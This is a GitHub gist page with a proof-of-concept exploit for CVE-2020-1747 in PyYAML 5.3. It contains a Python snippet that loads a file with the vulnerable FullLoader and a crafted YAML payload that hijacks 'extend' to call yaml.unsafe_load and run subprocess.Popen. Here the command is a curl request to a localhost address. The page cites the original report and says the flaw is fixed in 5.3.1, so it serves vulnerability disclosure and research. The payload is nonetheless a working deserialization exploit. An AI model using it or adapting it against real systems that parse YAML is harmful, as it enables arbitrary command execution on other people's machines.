Skip to content

Instantly share code, notes, and snippets.

@adamczi
Last active October 30, 2023 11:01
Show Gist options
  • Save adamczi/23a3b6d4bb7b2be35e79b0667d6682e1 to your computer and use it in GitHub Desktop.
Save adamczi/23a3b6d4bb7b2be35e79b0667d6682e1 to your computer and use it in GitHub Desktop.
CVE-2020-1747 PyYAML PoC
# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386
# Explanation: https://2130706433.net/blog/pyyaml/
from yaml import *
with open('payload.yaml','rb') as f:
content = f.read()
data = load(content, Loader=FullLoader) # Using vulnerable FullLoader
# The `extend` function is overriden to run `yaml.unsafe_load` with
# custom `listitems` argument, in this case a simple curl request
- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]'
state:
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment